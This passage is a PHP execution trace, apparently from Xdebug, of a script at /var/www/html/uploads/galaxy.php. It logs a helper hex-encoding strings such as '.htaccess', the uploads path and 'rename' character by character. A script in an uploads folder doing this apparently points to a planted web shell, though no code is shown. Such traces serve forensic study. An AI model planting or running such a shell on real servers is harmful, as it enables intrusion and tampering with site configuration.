3	936	0	0.033215	484744	ord	0		/var/www/html/uploads/galaxy.php	18	1	'i'
3	936	1	0.033227	484784
3	936	R			105
3	937	0	0.033239	484744	dechex	0		/var/www/html/uploads/galaxy.php	18	1	105
3	937	1	0.033250	484816
3	937	R			'69'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '69'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	938	0	0.033278	484744	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	938	1	0.033289	484784
3	938	R			116
3	939	0	0.033301	484744	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	939	1	0.033312	484816
3	939	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	931	1	0.033341	484752
2	931	R			'65646974'
2	940	0	0.033354	484712	hex	1		/var/www/html/uploads/galaxy.php	117	1	'.htaccess'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	941	0	0.033384	484712	ord	0		/var/www/html/uploads/galaxy.php	18	1	'.'
3	941	1	0.033396	484752
3	941	R			46
3	942	0	0.033408	484712	dechex	0		/var/www/html/uploads/galaxy.php	18	1	46
3	942	1	0.033419	484784
3	942	R			'2e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	943	0	0.033449	484744	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	943	1	0.033460	484784
3	943	R			104
3	944	0	0.033472	484744	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	944	1	0.033483	484816
3	944	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	945	0	0.033513	484744	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	945	1	0.033524	484784
3	945	R			116
3	946	0	0.033536	484744	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	946	1	0.033548	484816
3	946	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	947	0	0.033576	484744	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	947	1	0.033587	484784
3	947	R			97
3	948	0	0.033599	484744	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	948	1	0.033610	484816
3	948	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	949	0	0.033639	484752	ord	0		/var/www/html/uploads/galaxy.php	18	1	'c'
3	949	1	0.033651	484792
3	949	R			99
3	950	0	0.033663	484752	dechex	0		/var/www/html/uploads/galaxy.php	18	1	99
3	950	1	0.033674	484824
3	950	R			'63'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '63'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	951	0	0.033707	484752	ord	0		/var/www/html/uploads/galaxy.php	18	1	'c'
3	951	1	0.033719	484792
3	951	R			99
3	952	0	0.033731	484752	dechex	0		/var/www/html/uploads/galaxy.php	18	1	99
3	952	1	0.033742	484824
3	952	R			'63'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '63'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	953	0	0.033770	484752	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	953	1	0.033782	484792
3	953	R			101
3	954	0	0.033793	484752	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	954	1	0.033805	484824
3	954	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	955	0	0.033833	484752	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	955	1	0.033845	484792
3	955	R			115
3	956	0	0.033856	484752	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	956	1	0.033868	484824
3	956	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	957	0	0.033896	484760	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	957	1	0.033907	484800
3	957	R			115
3	958	0	0.033919	484760	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	958	1	0.033931	484832
3	958	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	940	1	0.033959	484760
2	940	R			'2e6874616363657373'
2	959	0	0.033973	484904	hex	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	960	0	0.034003	484904	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	960	1	0.034014	484944
3	960	R			47
3	961	0	0.034026	484904	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	961	1	0.034037	484976
3	961	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	962	0	0.034067	484936	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	962	1	0.034078	484976
3	962	R			118
3	963	0	0.034090	484936	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	963	1	0.034101	485008
3	963	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	964	0	0.034130	484936	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	964	1	0.034141	484976
3	964	R			97
3	965	0	0.034153	484936	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	965	1	0.034164	485008
3	965	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	966	0	0.034193	484936	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	966	1	0.034204	484976
3	966	R			114
3	967	0	0.034216	484936	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	967	1	0.034227	485008
3	967	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	968	0	0.034256	484944	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	968	1	0.034267	484984
3	968	R			47
3	969	0	0.034279	484944	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	969	1	0.034291	485016
3	969	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	970	0	0.034320	484944	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	970	1	0.034330	484984
3	970	R			119
3	971	0	0.034342	484944	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	971	1	0.034353	485016
3	971	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	972	0	0.034382	484944	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	972	1	0.034396	484984
3	972	R			119
3	973	0	0.034408	484944	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	973	1	0.034420	485016
3	973	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	974	0	0.034448	484944	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	974	1	0.034460	484984
3	974	R			119
3	975	0	0.034472	484944	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	975	1	0.034483	485016
3	975	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	976	0	0.034511	484952	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	976	1	0.034522	484992
3	976	R			47
3	977	0	0.034534	484952	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	977	1	0.034545	485024
3	977	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	978	0	0.034574	484952	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	978	1	0.034585	484992
3	978	R			104
3	979	0	0.034597	484952	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	979	1	0.034608	485024
3	979	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	980	0	0.034637	484952	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	980	1	0.034648	484992
3	980	R			116
3	981	0	0.034659	484952	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	981	1	0.034671	485024
3	981	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	982	0	0.034700	484952	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	982	1	0.034711	484992
3	982	R			109
3	983	0	0.034723	484952	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	983	1	0.034734	485024
3	983	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	984	0	0.034762	484960	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	984	1	0.034774	485000
3	984	R			108
3	985	0	0.034786	484960	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	985	1	0.034801	485032
3	985	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	986	0	0.034830	484960	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	986	1	0.034842	485000
3	986	R			47
3	987	0	0.034854	484960	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	987	1	0.034865	485032
3	987	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	988	0	0.034894	484960	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	988	1	0.034905	485000
3	988	R			117
3	989	0	0.034917	484960	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	989	1	0.034928	485032
3	989	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	990	0	0.034957	484960	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	990	1	0.034968	485000
3	990	R			112
3	991	0	0.034980	484960	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	991	1	0.034991	485032
3	991	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	992	0	0.035020	484968	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	992	1	0.035031	485008
3	992	R			108
3	993	0	0.035043	484968	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	993	1	0.035054	485040
3	993	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	994	0	0.035082	484968	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	994	1	0.035098	485008
3	994	R			111
3	995	0	0.035110	484968	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	995	1	0.035122	485040
3	995	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	996	0	0.035150	484968	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	996	1	0.035162	485008
3	996	R			97
3	997	0	0.035174	484968	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	997	1	0.035185	485040
3	997	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	998	0	0.035214	484968	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	998	1	0.035224	485008
3	998	R			100
3	999	0	0.035236	484968	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	999	1	0.035247	485040
3	999	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1000	0	0.035276	484984	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1000	1	0.035288	485024
3	1000	R			115
3	1001	0	0.035300	484984	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1001	1	0.035311	485056
3	1001	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	959	1	0.035340	484984
2	959	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	1002	0	0.035355	484904	hex	1		/var/www/html/uploads/galaxy.php	117	1	'rename'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1003	0	0.035385	484904	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1003	1	0.035397	484944
3	1003	R			114
3	1004	0	0.035409	484904	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1004	1	0.035420	484976
3	1004	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1005	0	0.035450	484936	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1005	1	0.035461	484976
3	1005	R			101
3	1006	0	0.035473	484936	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1006	1	0.035485	485008
3	1006	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1007	0	0.035514	484936	ord	0		/var/www/html/uploads/galaxy.php	18	1	'n'
3	1007	1	0.035526	484976
3	1007	R			110
3	1008	0	0.035538	484936	dechex	0		/var/www/html/uploads/galaxy.php	18	1	110
3	1008	1	0.035549	485008
3	1008	R			'6e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1009	0	0.035578	484936	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1009	1	0.035589	484976
3	1009	R			97
3	1010	0	0.035602	484936	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1010	1	0.035613	485008
3	1010	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1011	0	0.035642	484944	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	1011	1	0.035653	484984
3	1011	R			109
3	1012	0	0.035665	484944	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	1012	1	0.035677	485016
3	1012	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1013	0	0.035706	484944	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1013	1	0.035718	484984
3	1013	R			101
3	1014	0	0.035730	484944	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1014	1	0.035741	485016
3	1014	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1002	1	0.035771	484944
2	1002	R			'72656e616d65'
2	1015	0	0.035784	484904	hex	1		/var/www/html/uploads/galaxy.php	117	1	'.htaccess'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1016	0	0.035819	484904	ord	0		/var/www/html/uploads/galaxy.php	18	1	'.'
3	1016	1	0.035830	484944
3	1016	R			46
3	1017	0	0.035842	484904	dechex	0		/var/www/html/uploads/galaxy.php	18	1	46
3	1017	1	0.035854	484976
3	1017	R			'2e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1018	0	0.035883	484936	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1018	1	0.035895	484976
3	1018	R			104
3	1019	0	0.035907	484936	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1019	1	0.035919	485008
3	1019	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1020	0	0.035948	484936	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1020	1	0.035960	484976
3	1020	R			116
3	1021	0	0.035972	484936	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1021	1	0.035984	485008
3	1021	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1022	0	0.036013	484936	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1022	1	0.036024	484976
3	1022	R			97
3	1023	0	0.036036	484936	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1023	1	0.036047	485008
3	1023	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1024	0	0.036077	484944	ord	0		/var/www/html/uploads/galaxy.php	18	1	'c'
3	1024	1	0.036088	484984
3	1024	R			99
3	1025	0	0.036100	484944	dechex	0		/var/www/html/uploads/galaxy.php	18	1	99
3	1025	1	0.036112	485016
3	1025	R			'63'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '63'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1026	0	0.036141	484944	ord	0		/var/www/html/uploads/galaxy.php	18	1	'c'
3	1026	1	0.036152	484984
3	1026	R			99
3	1027	0	0.036164	484944	dechex	0		/var/www/html/uploads/galaxy.php	18	1	99
3	1027	1	0.036176	485016
3	1027	R			'63'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '63'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1028	0	0.036204	484944	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1028	1	0.036216	484984
3	1028	R			101
3	1029	0	0.036228	484944	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1029	1	0.036239	485016
3	1029	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1030	0	0.036268	484944	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1030	1	0.036280	484984
3	1030	R			115
3	1031	0	0.036292	484944	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1031	1	0.036303	485016
3	1031	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1032	0	0.036332	484952	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1032	1	0.036344	484992
3	1032	R			115
3	1033	0	0.036356	484952	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1033	1	0.036367	485024
3	1033	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1015	1	0.036396	484952
2	1015	R			'2e6874616363657373'
2	1034	0	0.036410	485032	hex	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1035	0	0.036440	485032	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1035	1	0.036451	485072
3	1035	R			47
3	1036	0	0.036464	485032	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1036	1	0.036475	485104
3	1036	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1037	0	0.036505	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	1037	1	0.036519	485104
3	1037	R			118
3	1038	0	0.036531	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	1038	1	0.036543	485136
3	1038	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1039	0	0.036572	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1039	1	0.036583	485104
3	1039	R			97
3	1040	0	0.036595	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1040	1	0.036607	485136
3	1040	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1041	0	0.036636	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1041	1	0.036647	485104
3	1041	R			114
3	1042	0	0.036659	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1042	1	0.036671	485136
3	1042	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1043	0	0.036700	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1043	1	0.036711	485112
3	1043	R			47
3	1044	0	0.036723	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1044	1	0.036734	485144
3	1044	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1045	0	0.036763	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1045	1	0.036775	485112
3	1045	R			119
3	1046	0	0.036787	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1046	1	0.036798	485144
3	1046	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1047	0	0.036827	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1047	1	0.036838	485112
3	1047	R			119
3	1048	0	0.036862	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1048	1	0.036875	485144
3	1048	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1049	0	0.036953	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1049	1	0.036966	485112
3	1049	R			119
3	1050	0	0.036978	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1050	1	0.036990	485144
3	1050	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1051	0	0.037019	485080	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1051	1	0.037030	485120
3	1051	R			47
3	1052	0	0.037042	485080	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1052	1	0.037054	485152
3	1052	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1053	0	0.037083	485080	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1053	1	0.037094	485120
3	1053	R			104
3	1054	0	0.037106	485080	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1054	1	0.037117	485152
3	1054	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1055	0	0.037147	485080	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1055	1	0.037158	485120
3	1055	R			116
3	1056	0	0.037170	485080	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1056	1	0.037181	485152
3	1056	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1057	0	0.037210	485080	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	1057	1	0.037221	485120
3	1057	R			109
3	1058	0	0.037233	485080	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	1058	1	0.037245	485152
3	1058	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1059	0	0.037280	485088	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1059	1	0.037292	485128
3	1059	R			108
3	1060	0	0.037304	485088	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1060	1	0.037316	485160
3	1060	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1061	0	0.037345	485088	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1061	1	0.037356	485128
3	1061	R			47
3	1062	0	0.037368	485088	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1062	1	0.037379	485160
3	1062	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1063	0	0.037409	485088	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	1063	1	0.037420	485128
3	1063	R			117
3	1064	0	0.037432	485088	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	1064	1	0.037443	485160
3	1064	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1065	0	0.037472	485088	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1065	1	0.037483	485128
3	1065	R			112
3	1066	0	0.037495	485088	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1066	1	0.037507	485160
3	1066	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1067	0	0.037535	485096	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1067	1	0.037547	485136
3	1067	R			108
3	1068	0	0.037559	485096	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1068	1	0.037570	485168
3	1068	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1069	0	0.037598	485096	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	1069	1	0.037610	485136
3	1069	R			111
3	1070	0	0.037622	485096	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	1070	1	0.037633	485168
3	1070	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1071	0	0.037661	485096	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1071	1	0.037673	485136
3	1071	R			97
3	1072	0	0.037685	485096	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1072	1	0.037696	485168
3	1072	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1073	0	0.037725	485096	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1073	1	0.037736	485136
3	1073	R			100
3	1074	0	0.037749	485096	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1074	1	0.037760	485168
3	1074	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1075	0	0.037788	485112	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1075	1	0.037800	485152
3	1075	R			115
3	1076	0	0.037812	485112	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1076	1	0.037824	485184
3	1076	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1034	1	0.037853	485112
2	1034	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	1077	0	0.037869	485160	hex	1		/var/www/html/uploads/galaxy.php	117	1	'.htaccess'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1078	0	0.037900	485160	ord	0		/var/www/html/uploads/galaxy.php	18	1	'.'
3	1078	1	0.037912	485200
3	1078	R			46
3	1079	0	0.037924	485160	dechex	0		/var/www/html/uploads/galaxy.php	18	1	46
3	1079	1	0.037935	485232
3	1079	R			'2e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1080	0	0.037965	485192	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1080	1	0.037976	485232
3	1080	R			104
3	1081	0	0.037991	485192	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1081	1	0.038003	485264
3	1081	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1082	0	0.038033	485192	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1082	1	0.038044	485232
3	1082	R			116
3	1083	0	0.038056	485192	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1083	1	0.038068	485264
3	1083	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
